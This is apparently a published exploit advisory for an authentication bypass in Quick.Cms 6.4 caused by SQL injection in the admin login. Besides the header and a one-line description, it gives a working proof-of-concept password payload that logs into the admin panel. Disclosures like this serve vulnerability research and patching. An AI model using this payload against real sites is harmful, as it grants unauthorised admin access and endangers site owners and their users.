Quick CMS version 6.4 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
fcbaf3be8a8a4e01d28e4b92bd8b5631 ___________________________________________________
|
| Exploit Title: Quick.Cms_v6.4 Autentication Bypass Vulnerability
| Exploit Author: Ashiyane Digital security Team (M.R.S.L.Y)
| Vendor Homepage: http://opensolution.org
| Software Link:
http://opensolution.org/download/home.html?sFile=Quick.Cms_v6.4-en.zip
| Version: Quick.Cms_v6.4
| Date: 2017-10-14
| Category: webapps
| Tested on: Kali-Linux /FireFox
| CVE: N/A
| Dork: N/A
|__________________________________________________
The vulnerability is in the login area of Quick.Cms_v6.4,
where we can enter the panel only using some parameters such as
password
__________________________________________________
Proof of Concept :
http://127.0.0.1/PATH/admin.php => User: attacker@gmail.com Pass:
'=''or'
__________________________________________________
Discovered By : Ashiyane Digital security Team
__________________________________________________